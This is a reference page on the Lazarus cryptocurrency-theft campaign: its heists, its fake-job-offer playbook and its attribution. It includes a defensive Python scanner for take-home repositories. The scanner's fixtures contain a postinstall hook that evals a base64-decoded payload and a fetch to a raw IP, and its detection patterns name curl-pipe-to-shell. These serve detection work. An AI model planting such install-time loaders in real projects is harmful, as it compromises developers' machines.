
Campaign

Lazarus cryptocurrency-theft programme

2017–present · active

Sustained North Korean state cybercrime programme (2017–present) targeting cryptocurrency exchanges, custody providers, and DeFi protocols. Estimated cumulative proceeds exceed $5 billion across hundreds of attributed operations.

The Lazarus cryptocurrency-theft programme is a sustained North Korean state cybercrime operation that has, since approximately 2017, targeted cryptocurrency exchanges, custody providers, and DeFi protocols as a strategic sanctions-evasion mechanism. Cumulative estimated proceeds — per U.N. Panel of Experts on DPRK sanctions, U.S. Treasury, Chainalysis, and Elliptic — exceed $5 billion across hundreds of attributed operations.

It is the most operationally successful state cybercrime programme in any public attribution and a primary funding source for the North Korean weapons programmes that international sanctions are intended to constrain.

Strategic context

North Korea operates under one of the most comprehensive international sanctions regimes in history. Conventional banking access is heavily restricted; foreign-currency revenue is constrained; access to specialised technology for weapons programmes is formally prohibited. Cryptocurrency theft has become a primary workaround, leveraging:

  • Pseudo-anonymous on-chain settlement that does not require conventional banking relationships.
  • Cross-border movement without requiring physical movement of value.
  • Conversion options through non-cooperating jurisdictions (laundering through Russian, Iranian, and certain Southeast Asian crypto-OTC infrastructure).
  • State-scale operational capacity to target sophisticated victims that ordinary criminal operators cannot.

The U.N. Panel of Experts (whose mandate lapsed in April 2024 after Russia vetoed its renewal) estimated North Korean crypto-theft proceeds at roughly $3 billion for 2017–2023. Chainalysis attributed about $1.34 billion to DPRK actors in 2024 alone, and the Bybit theft (~$1.5B, February 2025) by itself exceeds that annual total, so the 2024–2025 period has substantially increased the cumulative figure.

Component incidents

Exchange / custody heists

  • Coincheck (2018) — $530M (NEM); single-signature hot wallet
  • Atomic Wallet (2023) — ~$100M; multi-asset wallet client compromise
  • WazirX (2024) — ~$230M; multi-signature compromise of Indian exchange
  • Bybit (2025) — ~$1.5B (current largest crypto theft in history); JavaScript injected into the Safe{Wallet} web front-end altered the transaction that Bybit's multisig signers approved

Bridge / DeFi heists

  • Ronin Bridge (2022) — $625M; 5-of-9 validator quorum compromise
  • Harmony Horizon Bridge (2022) — $100M; 2-of-5 multi-signature compromise
  • Stake.com (2023) — $41M; signing-key compromise

Operational template

Across years and dozens of operations, the Lazarus crypto-theft playbook has been notably consistent:

  1. Target identification via LinkedIn / GitHub to identify engineers at exchanges, custody providers, and DeFi protocols.
  2. Spearphishing via fake job offers — typically remote roles with attractive salaries — to lure engineers into video interviews and "coding challenges."
  3. Malicious dependencies or interview tooling delivered during the assessment phase (a take-home repository whose install step executes attacker code), dropping custom implants on engineering laptops: the AppleJeus trojanised trading applications on macOS and Windows, and on Windows the FudModule kernel rootkit.
  4. Privileged access escalation to signing keys, wallet infrastructure, or smart-contract upgrade keys.
  5. Theft via legitimately-signed transactions. Because the withdrawals are valid at the protocol layer, there is no exploit to patch or contract to pause, and recovery depends on off-chain tracing and freezes rather than on reverting a protocol bug.
  6. Laundering via Tornado Cash (sanctioned 2022), Sinbad (sanctioned 2023), eXch (shut down in 2025 after German authorities seized its infrastructure), cross-chain bridges, and Iranian / Russian OTC desks.

The infrastructure-supplier compromise variant (Bybit / Safe{Wallet}) is the most recent evolution: compromising a vendor used by many exchanges, rather than the exchanges directly, multiplies the operational leverage of each pre-positioning effort.
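Step 3 of the template is the point where a defender on the engineering side can still intervene: the "coding challenge" arrives as a repository that the candidate is expected to install and run. The script below is an added example, not tooling from any organisation named on this page. It triages a cloned repository before `npm install` by flagging lifecycle hooks that execute on install, shell commands that fetch-and-execute or evaluate decoded payloads, dependencies pulled from outside the registry, and source-level indicators such as `eval` of a decoded buffer or connections to raw IP addresses. The patterns are generic heuristics assumed for illustration, not signatures of any specific malware family, and the sample repository contents are constructed inline; `load_repo` shows how the same scan would be run over a real clone.

```python
"""Triage a cloned "coding challenge" repo before installing or running it.

Added example for this page; not tooling from any organisation named on it.
The indicators below are generic heuristics (assumed for illustration), not
signatures of any specific malware family. A hit means "read this by hand
before running anything", not "confirmed malicious".
"""
import json
import re
from pathlib import Path
from typing import Dict, List

# npm lifecycle hooks that run arbitrary shell during `npm install`, i.e.
# before the candidate has read a single line of the challenge code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristics applied to the hook command string itself.
SHELL_PATTERNS = {
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b[^|&;]*\|\s*(sh|bash|node)\b"),
    "inline-node-eval": re.compile(r"\bnode\s+-e\b"),
    "base64-decode-in-hook": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}

# Heuristics applied to JavaScript / TypeScript source files.
SOURCE_PATTERNS = {
    "eval-of-decoded-buffer": re.compile(r"\beval\s*\(\s*Buffer\.from\("),
    "function-constructor": re.compile(r"\bnew\s+Function\s*\("),
    "long-encoded-blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?"),
    "child-process-spawn": re.compile(r"require\(['\"]child_process['\"]\)"),
}

# Dependency specs that bypass the registry and install from an arbitrary source.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|https?://|github:|file:|git://)")


def scan_package_json(text: str) -> List[Dict[str, str]]:
    """Flag install-time hooks and non-registry dependencies in a package.json."""
    findings: List[Dict[str, str]] = []
    pkg = json.loads(text)
    scripts = pkg.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Any install-time hook is worth a look; specific shapes get extra tags.
        findings.append({"kind": "lifecycle-hook", "where": hook, "detail": cmd})
        for name, rx in SHELL_PATTERNS.items():
            if rx.search(cmd):
                findings.append({"kind": name, "where": hook, "detail": cmd})
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep, spec in pkg.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append({"kind": "non-registry-dependency",
                                 "where": f"{section}.{dep}", "detail": spec})
    return findings


def scan_source(label: str, text: str) -> List[Dict[str, str]]:
    """Flag obfuscation / execution / raw-IP indicators in one source file."""
    findings: List[Dict[str, str]] = []
    for name, rx in SOURCE_PATTERNS.items():
        m = rx.search(text)
        if m:
            findings.append({"kind": name, "where": label, "detail": m.group(0)[:80]})
    return findings


def scan_repo(files: Dict[str, str]) -> List[Dict[str, str]]:
    """files maps a relative path to its content; see load_repo for a real clone."""
    findings: List[Dict[str, str]] = []
    for rel, content in files.items():
        if Path(rel).name == "package.json":
            findings.extend(scan_package_json(content))
        elif rel.endswith((".js", ".mjs", ".cjs", ".ts")):
            findings.extend(scan_source(rel, content))
    return findings


def load_repo(root: str) -> Dict[str, str]:
    """Read a cloned repository into the in-memory form scan_repo expects."""
    base = Path(root)
    return {
        str(p.relative_to(base)): p.read_text(errors="replace")
        for p in base.rglob("*")
        if p.is_file() and "node_modules" not in p.parts and ".git" not in p.parts
    }


# Constructed sample inputs (not taken from any real incident).
BENIGN_PKG = json.dumps({"name": "take-home", "version": "1.0.0",
                         "scripts": {"test": "jest"},
                         "dependencies": {"express": "^4.18.2"}})
SUSPECT_PKG = json.dumps({"name": "take-home", "version": "1.0.0",
                          "scripts": {"test": "jest",
                                      "postinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\""},
                          "dependencies": {"express": "^4.18.2",
                                           "helper-utils": "git+https://github.com/example/helper-utils.git"}})
SUSPECT_SRC = ("const cfg = require('./config');\n"
               "const cp = require('child_process');\n"
               "fetch('http://203.0.113.7/client');\n")  # TEST-NET address, constructed


def demo() -> List[Dict[str, str]]:
    """Scan the constructed sample repository; returns the findings list."""
    return scan_repo({"package.json": SUSPECT_PKG, "src/index.js": SUSPECT_SRC})


if __name__ == "__main__":
    import sys
    results = scan_repo(load_repo(sys.argv[1])) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"[{f['kind']}] {f['where']}: {f['detail']}")
```

Run it as `python triage.py path/to/clone` on a real take-home repository, or with no argument to see the constructed sample. The point of flagging every lifecycle hook, not only the obviously hostile shapes, is that `npm install` is the one step a candidate performs without reading the code; `npm install --ignore-scripts` followed by manual review of any hook is the corresponding safe habit, and a recruiter who insists the assessment be run on the candidate's primary work machine is itself a signal.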

Attribution

The U.N. Panel of Experts on DPRK sanctions formally attributed many of the operations in this campaign before its mandate lapsed in 2024. U.S. Treasury OFAC has sanctioned multiple specific addresses and three mixers, each designation explicitly citing Lazarus laundering: Blender.io (May 2022, for Ronin proceeds), Tornado Cash (August 2022; delisted in March 2025 after the Fifth Circuit's Van Loon decision), and Sinbad (November 2023, which Treasury described as a successor to Blender.io).

Park Jin Hyok — the Lazarus operator charged in 2018 for the Sony Pictures attack, Bangladesh Bank heist, and WannaCry — was the first individual publicly named for the broader Lazarus operational programme. A February 2021 DOJ indictment added Jon Chang Hyok and Kim Il alongside Park for crypto-specific operations, including the AppleJeus trojanised trading applications, but all of the named individuals and the principal architects remain in North Korea and beyond extradition reach.

Why it matters

The Lazarus crypto-theft programme established:

  • That state cybercrime is a viable sanctions-evasion strategy at significant scale. North Korea has, per public estimates, financed a meaningful share of its weapons programmes through crypto theft.
  • That decentralised cryptocurrency infrastructure is not, by virtue of decentralisation, immune to state-targeted theft. The most concentrated points — exchanges, custodians, bridges, and the vendors supplying them — are conventional targets exposed to conventional attacks.
  • That infrastructure-supplier compromise is the highest-leverage evolution of the playbook. The Bybit / Safe operation demonstrated that one supplier compromise can enable theft from any of the supplier's customers — a scaling property absent from direct-target operations.
  • That disruption of crypto laundering infrastructure (Tornado Cash, eXch, Sinbad sanctions) is a viable but partial counter-measure. Each sanctioned service was rapidly replaced by alternatives; the laundering ecosystem has substantial redundancy.

The operation remains active and is widely expected to continue increasing in scale and sophistication. Western policy responses — including U.S. Treasury sanctions on specific addresses, OFAC enforcement against U.S.-based crypto businesses that interact with sanctioned wallets, and continuing law-enforcement engagement with cooperating jurisdictions — have measurably impaired but not stopped the campaign.

Component incidents (4)

Tags: private-key, stolen

Coincheck NEM heist

Tokyo-based cryptocurrency exchange Coincheck lost 523 million NEM tokens (~$530M at the time) from a hot wallet that had no multi-signature protection. The largest single crypto-exchange theft at the time — later attributed to North Korea's Lazarus Group.

Victim
Coincheck Inc.
Loss
$530.0M